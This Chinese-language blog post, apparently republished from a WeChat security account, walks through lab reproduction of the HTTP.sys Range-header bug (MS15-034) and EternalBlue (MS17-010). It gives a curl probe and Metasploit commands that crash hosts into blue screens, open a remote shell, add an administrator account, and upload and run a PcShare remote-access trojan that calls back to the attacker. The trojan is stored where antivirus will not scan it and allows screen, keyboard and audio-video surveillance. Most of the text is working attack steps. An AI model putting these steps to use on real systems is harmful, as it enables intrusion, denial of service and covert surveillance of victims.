漏洞复现:CVE-2015-1635、CVE-2017-0144

admin 2025年6月26日01:15:08评论0 views字数 3188阅读10分37秒阅读模式

CVE-2015-1635-HTTP.SYS 远程执行代码漏洞

在 2015 年 4 月安全补丁日,微软发布的众多安全更新中,修复了 HTTP.sys 中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。

漏洞编号:CVE-2015-1635
微软通告:MS15-034
漏洞组件:HTTP.sys
影响系统:
Windows 7/8
Windows Server 2008 R2
Windows Server 2012 / R2(默认开启 IIS)
漏洞影响:
拒绝服务(DoS)— 立即蓝屏
潜在远程代码执行(复杂但存在)

攻击者可通过向启用IIS的服务器发送特制的Range请求,造成系统崩溃甚至远程执行代码,无需认证即可发起攻击。微软已通过KB3042553补丁修复此漏洞。

环境准备(Win2008 R2 + IIS + kali)

安装系统与配置 IIS

安装 Windows Server 2008 R2(未打补丁)

两台机器在同一网络(可通信)。可以互相ping通

安装 IIS 服务(默认开启 HTTP.sys)

服务器管理器 → 角色 → 添加角色 → Web Server(IIS)
漏洞复现:CVE-2015-1635、CVE-2017-0144
漏洞复现:CVE-2015-1635、CVE-2017-0144

查看系统版本(PowerShell 或 CMD 查看版本)

(Get-Item "C:WindowsSystem32driversHTTP.sys").VersionInfo | Format-List

6.1.7601.18798 或更高,表示已修复

漏洞复现:CVE-2015-1635、CVE-2017-0144版本为:6.1.7600.16385,所以存在该漏洞。

msf漏洞利用

kali返回数据包判断是否存在ms15_034

curl -v 192.168.2.153 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

部分
含义
curl
使用 curl 工具发起一个 HTTP 请求
-v
启用 verbose 模式(详细模式),显示请求和响应的头信息,便于调试
192.168.2.153
目标 IP 地址,默认端口是 80(HTTP)
-H "Host:irrelevant"
添加 HTTP 头部,伪造 Host 字段为 "irrelevant"(此值不影响漏洞触发)
-H "Range:bytes=0-18446744073709551615" 关键部分:构造 异常范围请求,试图从第 0 字节读到  字节,这是远超正常范围的非法请求,会触发 HTTP.sys 的整数溢出漏洞2^64 - 1

漏洞复现:CVE-2015-1635、CVE-2017-0144如果出现416和Requested Range Not Satisfiable,则证明存在漏洞,反之,则不存在

msf寻找漏洞

搜索模块

msfconsole
msf6>search MS15-034
漏洞复现:CVE-2015-1635、CVE-2017-0144

发现该漏洞有可利用的模块,

选择payload模块

选择payload模块,带有sanner的是验证模块,带有dos的是攻击模块:,  在 kali 系统,借助 metasploit 平台利用 ms15-034 漏洞读取服务器内存数据,这是获取内存信息的工具use 1漏洞复现:CVE-2015-1635、CVE-2017-0144

设置目标IP

看一下这个模块需要配置什么

show options

漏洞复现:CVE-2015-1635、CVE-2017-0144发现我们只需要设置目标ip就可以啦

set rhosts 目标ip
漏洞复现:CVE-2015-1635、CVE-2017-0144

开始读取内存信息

漏洞复现:CVE-2015-1635、CVE-2017-0144但它在大多数环境下并不能真正实现“读取任意内存”的效果漏洞复现:CVE-2015-1635、CVE-2017-0144

dos攻击模块

利用 ms15-034 漏洞进行 ddos 攻击,同样借助 metasploit 平台

msf6>use auxiliary/dos/http/ms15_034_ulonglongadd
Msf6 auxiliary > set rhosts 目标ip
Msf6 auxiliary >   set  threads 10    (把攻击线程数设置成 10 个)
Threads => 10
Msf6 auxiliary > run
漏洞复现:CVE-2015-1635、CVE-2017-0144
漏洞复现:CVE-2015-1635、CVE-2017-0144

攻击开始后,win7 或 win2008 瞬间蓝屏然后自动重启(win7 肯定蓝屏重启,win2008 有时不成功,不蓝屏),截图如下,win2008已经自动重启了:漏洞复现:CVE-2015-1635、CVE-2017-0144

再run攻击一次就开始蓝屏

漏洞复现:CVE-2015-1635、CVE-2017-0144漏洞修复,打补丁,微软官方网站有提供的,这是最可靠的方式,或者执行如下动作:禁用 IIS 内核缓存(可能 会降低 IIS 性能)

CVE-2017-0144(MS17-010)网络服务器攻击

MS17-010 是一个严重的 Windows 漏洞,影响包括 Windows Server 2008 在内的多个版本,允许远程执行代码。它在 2017 年被披露,并被广泛用于“永恒之蓝”(EternalBlue)攻击

CVE名称:CVE-2017-0144
公开时间:2017年3月14日(MS17-010 公告发布)
影响系统:
Windows Vista / 7 / 8 / 10
Windows Server 2008 / 2012 / 2016
漏洞类型:SMBv1 远程代码执行(RCE)
利用方式:无需认证、可远程利用、使用端口 445(SMB)
nmap -p445 --script smb-vuln-ms17-010 192.168.2.153

漏洞复现:CVE-2015-1635、CVE-2017-0144可以使用 EternalBlue(Metasploit)对该主机进行漏洞利用(获得 shell)。

搜索漏洞可利用的模块

漏洞复现:CVE-2015-1635、CVE-2017-0144搜索出来好几个 ms17-010,到底哪个是攻击漏洞,我们要根据提示信息和手动验证的方式来验证,一般 exploit 开头的都是直接渗透攻击的工具,也就是在这里面选。路径中的 smb 表示服务的意思

选择模块

use exploit/windows/smb/ms17_010_eternalblue 或者 use 0
info         //查看漏洞的信息
漏洞复现:CVE-2015-1635、CVE-2017-0144
漏洞复现:CVE-2015-1635、CVE-2017-0144

查看攻击参数

show options

漏洞复现:CVE-2015-1635、CVE-2017-0144指定 RHOST(remote host 靶机)和 LHOST(操作 机)。

漏洞复现:CVE-2015-1635、CVE-2017-0144当我们找到并 use 这个 msf17-010 漏洞的时候,其实 msf 就帮你指定好了这个木马,不需要我们再自己 set 了,所以这个指令不需要执行。记得关闭目标主机的防火墙,或者给防火墙添加一些端口出入规则,不然攻击可能会失败。并且查看一下是否打了最新的补丁,如果打了最新的补丁,那也是攻击失败的

漏洞复现:CVE-2015-1635、CVE-2017-0144

开始攻击

漏洞复现:CVE-2015-1635、CVE-2017-0144

得到shell

shell

漏洞复现:CVE-2015-1635、CVE-2017-0144查看用户

net user

发现中文乱码chcp 65001漏洞复现:CVE-2015-1635、CVE-2017-0144

创建用户

net user
漏洞复现:CVE-2015-1635、CVE-2017-0144
漏洞复现:CVE-2015-1635、CVE-2017-0144

添加为管理员

net localgroup administrators 22w4hyq /add

漏洞复现:CVE-2015-1635、CVE-2017-0144
漏洞复现:CVE-2015-1635、CVE-2017-0144

pcshare生成木马远程控制

我们上传一个远程桌面控制木马程序,pcshare 双击打开 PcShare.exe,然后点击弹框中的取消按钮  点击生成客户漏洞复现:CVE-2015-1635、CVE-2017-0144漏洞复现:CVE-2015-1635、CVE-2017-0144

漏洞复现:CVE-2015-1635、CVE-2017-0144查看当前打开 pcshare 工具的主机,在物理机打开的,物理机的 ip 的地址要填写在上面的弹框中,表示将来的木马程序将目标主机的数据发送给当前物理机的 pcshare 工具上点击生成,会弹出如下窗口,它自动生成了一个木马程序,先保存下来,文件名称随便写。注意,有可能被杀毒软件杀掉,因为是木马程序,所以要选择一个保存到一个设置了免杀的目录中去,比如 tools 文件夹(或这个时候关闭杀毒软件)。

漏洞复现:CVE-2015-1635、CVE-2017-0144

先退出shelleixt

漏洞复现:CVE-2015-1635、CVE-2017-0144

接着将生成的 muma.exe 文件上传到 kali 主机上,比如上传到了/root 目录下面。最后将上传到 kali 上的 muma.exe 程序文件上传到目标主机上,上传到目标的 c 盘根目录中。

upload /root/muma.exe C:
漏洞复现:CVE-2015-1635、CVE-2017-0144

漏洞复现:CVE-2015-1635、CVE-2017-0144接下来通过 kali 的 msf,远程执行一下这个文件,提示如下进程建立,表示运行成功了。

execute -f c:\muma.exe

漏洞复现:CVE-2015-1635、CVE-2017-0144然后再去被攻击机看一下,这个文件运行成功之后,这个文件就消失了,其实是隐藏到某个驱动当中去了。然后看一下我们自己本机的 pcshare 工具窗口,等待一下之后,就看到有内容产生了。

注意:一定要先关闭自己本机的防火墙,不然 muma.exe 程序没办法连接上你的 pcshare 工具。

这就拿到了目标主机的所有操作,这里我们可以进行屏幕监控、保存屏幕录像、文件管理、进程管理、键盘管控(这个功能没试过)、注册表管理、音视频监控、窗口管理等等漏洞复现:CVE-2015-1635、CVE-2017-0144

漏洞复现:CVE-2015-1635、CVE-2017-0144

成功上线

漏洞复现:CVE-2015-1635、CVE-2017-0144
漏洞复现:CVE-2015-1635、CVE-2017-0144

原文始发于微信公众号(Cauchy网安):漏洞复现:CVE-2015-1635、CVE-2017-0144

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月26日01:15:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现:CVE-2015-1635、CVE-2017-0144http://cn-sec.com/archives/4168582.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息